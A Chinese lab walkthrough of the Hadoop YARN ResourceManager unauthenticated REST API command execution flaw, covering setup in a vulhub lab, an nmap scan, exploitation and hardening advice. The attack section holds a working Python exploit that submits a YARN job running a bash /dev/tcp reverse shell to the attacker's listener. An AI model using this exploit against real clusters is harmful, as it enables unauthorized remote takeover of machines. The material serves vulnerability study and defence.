文章目录

  • 一、介绍
    • 1.1 简介
    • 1.2 漏洞成因
  • 二、模拟环境
  • 三、信息收集
  • 四、攻击方法
  • 五、漏洞防御

一、介绍

1.1 简介

  Hadoop作为一个分布式计算应用程序框架,种类功能繁多,各种组件安全问题会带来很大的攻击面。

  Apache Hadoop YARN是Hadoop的核心组件之一,负责将资源分配在Hadoop集群中运行的各种应用程序,并调度要在不同集群节点上执行的任务。(独立出的资源管理框架,负责资源管理和调度)

1.2 漏洞成因

  负责对资源进行同一管理调度的ReasourceManager组件的UI管理界面开放在8080/8088端口,攻击者无需认证即可通过REST API部署任务来执行任意命令,最终可完全控制集群中所有的机器。

二、模拟环境

  • 受害者IP:192.168.226.140(ens33)
  • 攻击者IP:192.168.1.102

》》使用vulhub靶场,docker启动

启动报错

》》ping 不通

解决方法:(更换源)
》》查看当前源

》》写入自定义仓库
“registry-mirrors”:[“https://docker.mirrors.ustc.edu.cn”]

》》保存文件,重启

问题解决

》》启动后访问192.168.226.140:8088即可访问到Hadoop YARN ResourceManager WebUI界面

三、信息收集

》》通过nmap扫描目标IP发现在8088端口上开放了Jetty(hadoop使用jetty作为servlet容器提供HTTP服务来访问web后台用于管理hdfs和mapreduce等)

》》浏览器访问web界面

四、攻击方法

》》nc本地监听等待shell连接

》》执行exp

#!/usr/bin/env pythonimport requeststarget = 'http://192.168.226.140:8088/'
lhost = '192.168.226.134' # put your local host ip here, and listen at port 9999url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {'application-id': app_id,'application-name': 'get-shell','am-container-spec': {'commands': {'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,},},'application-type': 'YARN',
}
requests.post(url, json=data)

五、漏洞防御

  1. 网络访问控制,使用防火墙对受影响服务端口访问源IP进行控制
  2. 如Hadoop环境仅对内网提供服务,不要将端口服务暴露在公网
  3. 如使用自建Hadoop,根据实际情况更新补丁(Hadoop在2.x版本以上提供了安全认证功能,加入了Kerberos认证机制)

Hadoop YARN ResourceManager未授权访问漏洞相关推荐

  1. 二十八种未授权访问漏洞合集(暂时最全)

    目录 0x01 未授权漏洞预览 0x02 Active MQ 未授权访问 0x03 Atlassian Crowd 未授权访问 0x04 CouchDB 未授权访问 0x05 Docker 未授权访问 ...

  2. Hadoophbase监控页面未授权访问漏洞处理方案验证过程实现

    Hadoop&hbase监控页面未授权访问漏洞处理方案验证 Hadoop:监控页面授权登录配置步骤: 1 页面弹出框授权 1.1页面弹出框授权配置 1.上传附件的jar包hadoop-http ...

  3. 【应急类漏洞】————1、未授权访问漏洞总结

    前言 2018年5月,比特币勒索病毒 WannaCry 席卷全球,国内众多机构部门计算机系统瘫痪.根据之前应急响应的案例分析,以及一些安全报告统计,目前大部分的勒索病毒均利用未授权访问等通用漏洞进行植 ...

  4. 常用的30+种未授权访问漏洞汇总

    未授权访问漏洞汇总预览 1 .FTP 未授权访问(21) 2 .LDAP 未授权访问(389) 3 .Rsync 未授权访问(873) 4 .ZooKeeper 未授权访问(2181) 5 .Dock ...

  5. 常用的端口及未授权访问漏洞

    ​ 一.介绍 用于快速定位端口,查找开放端口脆弱点,有利于外网渗透 1.1 具体端口 端口号 使用 弱点 21 telnet 22 SSH 28退格漏洞.OpenSSL漏洞 25 SMTP协议 53 ...

  6. 漏洞检测与防御:Redis未授权访问漏洞复现

    漏洞检测与防御:Redis未授权访问漏洞复现 1. 未授权访问漏洞 未授权访问漏洞可以理解为安全配置.权限认证.授权页面存在缺陷,导致其他用户可以直接访问,从而引发权限可被操作,数据库.网站目录等敏感 ...

  7. 漏洞复现 - - - 未授权访问漏洞Redis

    目录 一,未授权访问漏洞概述 二,常见的未授权访问漏洞 Redis历史漏洞 三,Redis未授权访问 漏洞信息 Redis 简介 四,环境搭建 漏洞环境搭建 五,漏洞利用方法 实验环境 方法一 ​编辑 ...

  8. 未授权访问漏洞-Redis未授权访问漏洞

    文章目录 未授权概述 常见未授权访问漏洞 Redis未授权访问 Redis简介 应用场景 Redis 架构 漏洞发现 端口 端口探测 Redis常用命令 Redis历史漏洞 Redis未授权访问 Re ...

  9. UCloud-201809-001:Redis服务未授权访问漏洞安全预警

    UCloud-201809-001:Redis服务未授权访问漏洞安全预警 尊敬的UCloud用户,您好! 发布时间  2018-09-11 更新时间  2018-09-11 漏洞等级  High CV ...

最新文章

  1. poj1741(树的点分治)
  2. set集合, 深浅拷贝, join, 列表和字典在循环中删除元素的问题, fromkeys( , )
  3. 查找python项目依赖并生成requirements.txt的两种方法
  4. 中标麒麟桌面版yum安装mysql_中标麒麟Neokylin6桌面版如何本地yum安装软件
  5. python 卡方分箱算法_python实现二分类的卡方分箱示例
  6. 纪中C组模拟赛总结(2019.7.12)
  7. java 小时转换为xx天xx小时
  8. Angular.js为什么如此火呢?
  9. python 性能测试_python 写一个性能测试工具(一)
  10. JAVA类,变量的赋值一个小细节,以及static标注变量的意义
  11. VSCode 将已编辑好的文件中的 tab 键转换成空格键
  12. springCloud教程链接
  13. 用SPSS求均值 方差 标准差小例题
  14. 一位 19 年 Mac 用户的心声:“我真的很讨厌库克”
  15. 怎么将pdf转换成word?
  16. js实现图片无缝滚动特效
  17. 关于时域、频域和波数域的一些概念
  18. 【转】MyEclipse8优化设置
  19. 威海综合竞争力跃居全国第27位
  20. 查询出每个雇员的姓名,工资,部门名称,工资在公司的等级及其领导的姓名,领导的工资,以及领导所对应的等级

热门文章

  1. 轻松访问Google Chrome浏览器的特殊页面
  2. 经典c语言程序设计算法,C语言程序设计和循环结构相关的经典算法之一.ppt
  3. Android JNI的学习经历
  4. 一级计算机演示文稿试题,计算机等级一级MS Office试题:第四套演示文稿题
  5. 关于GDPR体系文件介绍,介绍GDPR体系文件的内容和意义
  6. iptable 详解_iptable详解
  7. 接入微信分享接口步骤
  8. 职场进阶指南:大厂人必看书籍推荐
  9. My97DatePicker无权限问题
  10. 曼彻斯特编码 差分曼彻斯特编码 计算机网络